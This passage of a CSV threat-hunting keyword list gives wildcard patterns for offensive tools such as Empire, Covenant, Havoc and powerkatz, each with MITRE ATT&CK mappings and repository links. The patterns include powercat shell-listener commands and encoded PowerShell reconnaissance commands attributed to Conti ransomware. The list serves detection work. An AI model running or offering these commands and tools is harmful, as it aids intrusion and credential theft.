+"*PostPowershellPowerViewUserHunter.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*PostRewMsfAuxiliaryCVE*.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*PostRewMsfExample.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*PostRewMsfPostConfInfos.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*PotatoTrigger.cpp*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z"
+"*PotatoTrigger.cpp*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z"
+"*PowerBreach.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*PowerBruteLogon.*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","113","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z"
+"*powercat -c * -p *","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z"
+"*powercat -l -p 4444*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z"
+"*Powercat.ps1*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z"
+"*powerdump.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*powerdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*PowerExtract-main.zip*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z"
+"*PowerForensics*","offensive_tool_keyword","PowerForensics","The purpose of PowerForensics is to provide an all inclusive framework for hard drive forensic analysis. PowerForensics currently supports NTFS and FAT file systems. and work has begun on Extended File System and HFS+ support.","T1003 - T1039 - T1046 - T1057","TA0005 - TA0007 - TA0010","N/A","N/A","Information Gathering","https://github.com/Invoke-IR/PowerForensics","1","1","N/A","N/A","10","1324","286","2022-05-20T14:43:10Z","2015-03-07T17:12:19Z"
+"*powerglot.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*powerkatz.dll*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z"
+"*powerkatz_x64.dll*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
+"*powerkatz_x86.dll*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
+"*PowerLessShell*","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1395","253","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z"
+"*PowerLessShell.py*","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1395","253","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z"
+"*powermad.ps1*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1022","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z"
+"*Powermad.psd1*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1022","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z"
+"*Powermad.psm1*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1022","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z"
+"*Powermad-master*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1022","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z"
+"*PowerMemory*","offensive_tool_keyword","PowerMemory","Exploit the credentials present in files and memory","T1003 - T1555 - T1213 - T1558","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/giMini/PowerMemory","1","0","N/A","N/A","9","819","219","2023-05-25T17:58:53Z","2015-08-29T17:09:23Z"
+"*PowerOPS*","offensive_tool_keyword","PowerOPS","PowerOPS is an application written in C# that does not rely on powershell.exe but runs PowerShell commands and functions within a powershell runspace environment (.NET). It intends to include multiple offensive PowerShell modules to make the process of Post Exploitation easier.","T1059 - T1027 - T1053 - T1129 - T1086","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/fdiskyou/PowerOPS","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*powerpick -Command *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z"
+"*powerpick.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*PowerPick.x64.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*Powerpreter.psm1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*powerpwn.powerdump*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","0","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z"
+"*powerpwn_tests*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","0","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z"
+"*power-pwn-main*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z"
+"*PowerSCCM.ps1*","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","301","110","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z"
+"*PowerSCCM.psd1*","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","301","110","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z"
+"*PowerSCCM.psm1*","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","301","110","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z"
+"*PowerSCCM-master*","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","301","110","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z"
+"*powerseb/PowerExtract*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z"
+"*powerseb/PowerExtract*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z"
+"*PowerSharpBinaries*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*PowerSharpPack.ps1*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*PowerSharpPack-master*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*PowerShdll*","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","1","N/A","N/A","10","1650","263","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z"
+"*powershell *C:\Users\Public\*.exe* forfiles.exe /p *\system32 *.exe**","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z"
+"*powershell *Get-EventLog -LogName security -Newest 500 | where {$_.EventID -eq 4624} | format-list -property * | findstr*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*powershell -c *\windows\system32\inetsrv\appcmd.exe list apppool /@t:*","greyware_tool_keyword","powershell","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large 
Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","Checking For Hidden Credentials With Appcmd.exe","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*powershell -enc cwBjACAALQBwAGEAdABoACAAIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAJABhACAALQBGAG8AcgBjAGUAOwBzAGMAIAAtAHAAYQB0AGgAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAB0AGUAcwB0AC4AdAB4AHQAIAAtAHYAYQBsAHUAZQAgACgAaQBlAHgAKAAnAG4AbAB0AGUAcwB0ACAALwBkAGMAbABpAHMAdAA6ACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA=*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #5","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*powershell -enc cwBjACAALQBwAGEAdABoACAAIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXABhAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAJABhACAALQBGAG8AcgBjAGUAOwBzAGMAIAAtAHAAYQB0AGgAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAB0AGUAcwB0AC4AdAB4AHQAIAAtAHYAYQBsAHUAZQAgACgAaQBlAHgAKAAnAG4AZQB0ACAAZwByAG8AdQBwACAAIgBkAG8AbQBhAGkAbgAgAGMAbwBtAHAAdQB0AGUAcgBzACIAIAAvAGQAbwBtAGEAaQBuACcAKQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA=*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #5","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - 
TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*powershell -enc cwBjACAALQBwAGEAdABoACAAYwA6AFwAaQBuAGUAdABwAHUAYgBcAHcAdwB3AHIAbwBvAHQAXABhAHMAcABuAGUAdABfAGMAbABpAGUAbgB0AFwAdABlAHMAdAAuAHQAeAB0ACAALQB2AGEAbAB1AGUAIAAoAGkAZQB4ACgAJwBsAHMAIABjADoAXABpAG4AZQB0AHAAdQBiAFwAdwB3AHcAcgBvAG8AdABcAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQAXAAnACkAfABPAHUAdAAtAFMAdAByAGkAbgBnACkA*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #2","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*powershell -enc cwBjACAALQBwAGEAdABoACAAYwA6AFwAaQBuAGUAdABwAHUAYgBcAHcAdwB3AHIAbwBvAHQAXABhAHMAcABuAGUAdABfAGMAbABpAGUAbgB0AFwAdABlAHMAdAAuAHQAeAB0ACAALQB2AGEAbAB1AGUAIAB0AGUAcwBlAHQA*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #6","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*powershell -enc dwBoAG8AYQBtAGkA*","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #1","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - 
T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*powershell -enc 